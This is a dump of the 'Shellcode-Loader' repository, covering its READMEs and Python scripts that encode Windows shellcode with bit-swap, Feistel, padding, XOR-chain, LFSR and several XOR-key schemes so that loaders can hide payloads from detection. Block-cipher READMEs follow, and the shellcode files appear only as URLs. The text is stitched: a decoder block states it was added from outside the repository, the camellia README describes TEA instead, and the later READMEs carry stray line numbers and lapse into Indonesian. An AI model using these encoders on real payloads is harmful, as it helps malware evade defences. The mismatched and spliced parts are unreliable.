Transform the shellcode with custom algorithm.

### Overview

`Bit-Mixing` is a bit-manipulation technique that mixes bits from different data blocks to produce a new data block. It is carried out with `XOR`, `AND`, `OR`, `shifting`, and `rotation` operations.

Any `Bit-Mixing` applied to shellcode must be an invertible process.

`Swap` is a bit-mixing variant that exchanges bits between different data blocks. It can also be seen as a more generic form of `Cross-Over`.

A data block consists of two components, `Left` and `Right`. Take `N` bits starting at position `P` from both `Left` and `Right`, and swap the two bit slices.

The algorithm applied here takes `N=3` bits from position `P=2` of `Left` and `Right`:

```
extract(X) = X & 0x1E
clear(X)   = X & 0xE1

L' = clear(L) | extract(R)
R' = clear(R) | extract(L)
```
--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# make sure n is 0 < n < 8
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

extract = lambda X: X & 0x1E
clear   = lambda X: X & 0xE1

# exchange the masked bit slices between the two bytes
cross = lambda L,R: (clear(L) | extract(R), clear(R) | extract(L))


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen  += 1

# generate single byte key
key = random.randrange(1,255)

# encode shellcode
enc_shcode = [key]
idx = 0
while idx < shlen:
    L = shcode[idx]
    R = shcode[idx + 1]

    L, R = cross(L, R)

    # rotate then XOR with the key
    enc_shcode.append(rotl8(L, 3) ^ key)
    enc_shcode.append(rotr8(R, 3) ^ key)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-swap/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/feistel/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

Uses the `Feistel Network` principle to encrypt the shellcode. A key is stored as the first byte and reused for every Feistel operation.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.

The Feistel Network is applied to each pair of bytes. Take 2 bytes, L and R. For each Feistel round, compute:

```
L[i + 1] = R[i]
R[i + 1] = L[i] xor Key
```
--------------------------------------------------------------------------------
/windows/writing/custom/feistel/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# generate single byte key
key = random.randrange(1, 255)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x00"
    shlen  += 1

# process in feistel network
enc_shcode = [key]
idx = 0
while idx < shlen:
    l = shcode[idx]     # LEFT
    r = shcode[idx+1]   # RIGHT

    enc_shcode.append(r)
    enc_shcode.append(l ^ key)
    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
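As an added example (not code from the ReversingID repository), the inverse of each bit-mixing transform in the `generate.py` scripts above, written the way an analyst would to confirm that the transforms are invertible, as the bit-swap README requires. A single `cross` with a swap mask covers both variants (mask `0x0F` reproduces the nibble swap of bit-crossover, mask `0x1E` the bit-swap mask), followed by the bit-rotation word rotation and the single-round Feistel step. The function names, the `mask` parameter and the sample bytes are this example's own assumptions.

```python
# Added example, not part of the ReversingID repository: decoders for the
# bit-crossover, bit-swap, bit-rotation and feistel encodings, plus a
# round-trip check.  The sample input is constructed, not a real payload.
import random

# same meaning as the generate.py lambdas (0 < n < 8 / 16)
def rotl8(x, n):  return ((x << n) & 0xFF) | (x >> (8 - n))
def rotr8(x, n):  return (x >> n) | ((x << (8 - n)) & 0xFF)
def rotl16(x, n): return ((x << n) & 0xFFFF) | (x >> (16 - n))
def rotr16(x, n): return (x >> n) | ((x << (16 - n)) & 0xFFFF)

def pad_even(data, filler=0x90):
    """The scripts append one filler byte to odd-length input."""
    return data if len(data) % 2 == 0 else data + bytes([filler])

def pairs(data):
    return zip(data[0::2], data[1::2])

# --- bit-crossover / bit-swap: exchange the bits selected by `mask` ---
# cross() is its own inverse, so decoding reuses it after undoing XOR/rotate
def cross(L, R, mask):
    keep = 0xFF ^ mask
    return (L & keep) | (R & mask), (R & keep) | (L & mask)

def encode_swap(data, key, mask):
    out = [key]
    for L, R in pairs(pad_even(data)):
        L, R = cross(L, R, mask)
        out += [rotl8(L, 3) ^ key, rotr8(R, 3) ^ key]
    return bytes(out)

def decode_swap(blob, mask):
    key, body = blob[0], blob[1:]
    out = []
    for L, R in pairs(body):
        # undo in reverse order: XOR, then rotation, then the swap itself
        L, R = rotr8(L ^ key, 3), rotl8(R ^ key, 3)
        out += cross(L, R, mask)
    return bytes(out)

# --- bit-rotation: byte rotations, then a 16-bit word rotation ---
def encode_rotation(data):
    out = []
    for L, R in pairs(pad_even(data)):
        W = rotr16((rotl8(L, 3) << 8) | rotr8(R, 7), 5)
        out += [(W >> 8) & 0xFF, W & 0xFF]
    return bytes(out)

def decode_rotation(blob):
    out = []
    for hi, lo in pairs(blob):
        W = rotl16((hi << 8) | lo, 5)
        out += [rotr8(W >> 8, 3), rotl8(W & 0xFF, 7)]
    return bytes(out)

# --- single-round feistel: (L, R) -> (R, L ^ key), padded with 0x00 ---
def encode_feistel(data, key):
    out = [key]
    for L, R in pairs(pad_even(data, 0x00)):
        out += [R, L ^ key]
    return bytes(out)

def decode_feistel(blob):
    key, body = blob[0], blob[1:]
    out = []
    for a, b in pairs(body):
        out += [b ^ key, a]
    return bytes(out)

def roundtrip_ok(data, key):
    """True when every transform decodes back to its padded input."""
    even = pad_even(data)
    return (decode_swap(encode_swap(data, key, 0x0F), 0x0F) == even
            and decode_swap(encode_swap(data, key, 0x1E), 0x1E) == even
            and decode_rotation(encode_rotation(data)) == even
            and decode_feistel(encode_feistel(data, key)) == pad_even(data, 0x00))

if __name__ == "__main__":
    sample = bytes(range(0, 250, 10))   # constructed 25-byte (odd) input
    print(roundtrip_ok(sample, random.randrange(1, 255)))
```

Because each step of these transforms is a bijection on a byte pair, decoding is just the steps applied backwards; the round-trip check is what catches a mask or rotation count that is not self-consistent between encoder and loader.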
--------------------------------------------------------------------------------
/windows/writing/custom/feistel/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/feistel/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

Inserts a single byte as padding for each shellcode block. The padding byte marks the block size, i.e. the number of shellcode bytes in the block.

The stored shellcode has the format `[M] [M-byte Shellcode] [N] [N-byte Shellcode] ... [Z] [Z-byte Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# encode the shellcode
idx = 0
enc_shcode = []

while idx < shlen:
    # generate padding number in the range of (2..4)
    pad = random.randrange(2, 5)
    remainder = shlen - idx

    if pad > remainder:
        pad = remainder

    enc_shcode.append(pad)
    enc_shcode += shcode[idx:idx+pad]
    idx += pad

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
print(f"Length: {len(enc_shcode)}")
```
--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/padding-dynamic/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

Chains `XOR` operations between the current byte and the previous byte.

This technique is based on the `CBC (Cipher Block Chaining)` mode of operation of block ciphers. In `CBC`, each plaintext block is XORed with the previous ciphertext block before being encrypted. The first block is combined with a block called the `IV (Initialization Vector)`. This can be written as:

```
C[i] = Enc(P[i] ^ C[i - 1], K)
C[0] = Enc(P[0] ^ IV, K)
```

In this technique the operation works at the byte level instead. Each byte is XORed with the previous ciphertext byte. The initial (genesis) key is the first byte of the shellcode, which is left unencrypted.

```
C[i] = P[i] ^ C[i - 1]
C[0] = P[0]
```

Another variant uses a random number as the genesis key (the `IV`), so that the first shellcode byte is encrypted with that byte.

```
C[i] = P[i] ^ C[i - 1]
C[0] = P[0] ^ K
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# random genesis key (IV), stored as the first byte
key = random.randrange(1, 255)

# encode shellcode: C[i] = P[i] ^ C[i - 1], with C[-1] = key
enc_shcode = [key]

idx = 0
while idx < shlen:
    enc_shcode.append(shcode[idx] ^ enc_shcode[idx])
    idx += 1

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-chain/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

XORs the shellcode with values produced by an `LFSR (Linear Feedback Shift Register)`. The byte sequence an `LFSR` produces is pseudo-random, so every shellcode byte is XORed with a different value.

The `LFSR` starts from a value (`seed`), which can be any byte. The seed may be a byte supplied specifically for this purpose, or the first byte of the shellcode.

In this example the shellcode is stored in the following format: `[Seed] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

# generate single byte seed
seed = random.randrange(1, 255)

# xor-encrypt
enc_shcode = [seed]

state = seed
taps  = [8, 6, 5, 4]
for c in shcode:
    # generate value from LFSR
    feedback = 0
    for tap in taps:
        feedback ^= (state >> (tap - 1)) & 1

    feedback ^= (state ^ (state >> 3)) & 1
    state = ((state << 1) | feedback) & 0xFF

    # XOR with shellcode byte
    enc_shcode.append(c ^ state)

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")

print(f"Length: {len(enc_shcode)}")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-lfsr/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. It is split into N blocks of at most S bytes each. Every block is preceded by the key used to encrypt that block.

The stored shellcode has the following format:

```
[N] [S] [[Key-1] [Encoded Shellcode-1]] [[Key-2] [Encoded Shellcode-2]] ... [[Key-N] [Encoded Shellcode-N]]
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# block size S, chosen at random from 4..7
stride = random.randrange(4,8)

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

nblock    = len(shcode) // stride
remainder = len(shcode) % stride
idx_s     = 0

# padding: fill the last block up to the stride with NOPs
if remainder != 0:
    shcode  = shcode + b"\x90"*(stride - remainder)
    nblock += 1

enc_shcode = [nblock, stride]

for idx_n in range(nblock):
    key = random.randrange(1, 255)

    enc_shcode += [key] + [ c ^ key for c in shcode[idx_s : idx_s + stride]]
    idx_s += stride

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-multikey/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. Split the shellcode into a sequence of byte pairs. Encryption uses one byte of the pair as the key and XORs it into the other byte.
--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen  += 1

# encode shellcode: first byte of each pair is kept as the key
enc_shcode = []
idx = 0
while idx < shlen:
    key = shcode[idx]

    enc_shcode.append(key)
    enc_shcode.append(key ^ shcode[idx + 1])

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-pair/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. A key is stored as the first byte and used to encrypt the shellcode. After each byte is encrypted, the key value is incremented.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

# generate single byte key
key = random.randrange(1, 255)

# xor-encrypt, incrementing the key (mod 256) after every byte
enc_shcode = [key]

for c in shcode:
    enc_shcode.append(c ^ key)
    key = (key + 1) & 0xFF

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")

print(f"Length: {len(enc_shcode)}")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. A key is stored as the first byte and reused for every shellcode byte.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

# generate single byte key
key = random.randrange(1, 255)

# xor-encrypt with the same key for every byte
enc_shcode = [key] + [ c ^ key for c in shcode ]

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/xor-singlekey/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Encrypts the payload with various algorithms.

See also [Crypto Reference](https://github.com/ReversingID/Crypto-Reference) for more information.
--------------------------------------------------------------------------------
/windows/writing/encryption/block/3-way/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`3-Way` encryption with a self-contained implementation that uses no third-party API.

`3-Way` is a block cipher that operates on three 32-bit integers, so both the block size and the key length are fixed at 96 bits.

### References

- [Reversing.ID 3-Way Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/3-Way/code.c)
- [Wikipedia 3-Way](https://en.wikipedia.org/wiki/3-Way)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/3-way/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/3-way/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption with block ciphers.

### Overview

A block cipher is an encryption algorithm that operates on fixed-size blocks. The shellcode is treated as plaintext and split into blocks.

The algorithms use a symmetric key: the same key is used for encryption and decryption.

--------------------------------------------------------------------------------
/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/anubis/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`Anubis` encryption with a self-contained implementation that uses no third-party API.

`Anubis` is a block cipher that was a candidate in the NESSIE project. The algorithm supports several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID Anubis Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Anubis)
- [Reversing.ID Anubis Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Anubis/Anubis.c)
- [Wikipedia Anubis](https://en.wikipedia.org/wiki/Anubis_(cipher))
--------------------------------------------------------------------------------
/windows/writing/encryption/block/anubis/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/anubis/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/blowfish/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`Blowfish` encryption with a self-contained implementation that uses no third-party API.

`Blowfish` is a block cipher with key sizes ranging from 32 bits to 448 bits. The example implementation uses a 128-bit key.

### References

- [Reversing.ID Blowfish Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Blowfish)
- [Wikipedia Blowfish](https://en.wikipedia.org/wiki/Blowfish_(cipher))
--------------------------------------------------------------------------------
/windows/writing/encryption/block/blowfish/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/blowfish/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/camellia/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

Uses the `Tiny Encryption Algorithm` for encryption.

### Reference

- [Wiki Tiny Encryption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm)
- [Git Tiny Encryption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/TEA.c)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/camellia/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/camellia/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`CIPHERUNICORN-A` encryption with a self-contained implementation that uses no third-party API.

`CIPHERUNICORN-A` supports several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID CIPHERUNICORN-A Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CIPHERUNICORN-A)
- [Reversing.ID CIPHERUNICORN-A Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CIPHERUNICORN-A/Unicorn-A.c)
- [Wikipedia CIPHERUNICORN-A](https://en.wikipedia.org/wiki/CIPHERUNICORN-A)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/clefia/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`CLEFIA` encryption with a self-contained implementation that uses no third-party API.

`CLEFIA` supports several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID CLEFIA Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CLEFIA)
- [Reversing.ID CLEFIA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CLEFIA/CLEFIA.c)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/clefia/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/clefia/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/des/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`DES (Data Encryption Standard)` encryption with a self-contained implementation that uses no third-party API.
8 | 9 | ### References 10 | 11 | - [Reversing.ID DES Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/DES) 12 | - [Wikipedia DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard) 13 | -------------------------------------------------------------------------------- /windows/writing/encryption/block/des/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/des/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/hierocrypt3/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi `Hierocrypt3` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `Hierocrypt3` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 
10 | 11 | ### References 12 | 13 | - [Reversing.ID Hierocrypt3 Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Hierocrypt-3) 14 | - [Reversing.ID Hierocrypt3 Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Hierocrypt3/Hierocrypt3.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `KHAZAD` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID KHAZAD Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/KHAZAD) 12 | - [Wikipedia KHAZAD](https://en.wikipedia.org/wiki/KHAZAD) -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/khazad/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 
4 | 5 | ### Overview 6 | 7 | Enkripsi `Khufu` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Khufu Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Khufu) 12 | - [Wikipedia Khufu (and Khafre)](https://en.wikipedia.org/wiki/Khufu_and_Khafre) -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/khufu/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/lea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `LEA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID LEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/LEA) 12 | - [Wikipedia LEA](https://en.wikipedia.org/wiki/LEA_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/lea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/lea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/lucifer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 
4 | 5 | ### Overview 6 | 7 | Enkripsi `Lucifer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Lucifer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Lucifer) 12 | - [Wikipedia Lucifer](https://en.wikipedia.org/wiki/Lucifer_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/lucifer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/lucifer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/safer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `SAFER+` (dari keluarga SAFER) dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | `SAFER` merupakan block cipher sebagai salah satu kontestan pada project NESSIE. Algoritma ini memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit. 
10 | 11 | ### References 12 | 13 | - [Reversing.ID SAFER Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/SAFER) 14 | - [Reversing.ID SAFER Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/SAFER/SAFER.c) 15 | - [Wikipedia SAFER](https://en.wikipedia.org/wiki/SAFER_(cipher)) -------------------------------------------------------------------------------- /windows/writing/encryption/block/safer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/safer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/tea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 4 | 5 | ### Overview 6 | 7 | Menggunakan `Tiny Encryptio Algorithm` untuk melakukan enkripsi. 
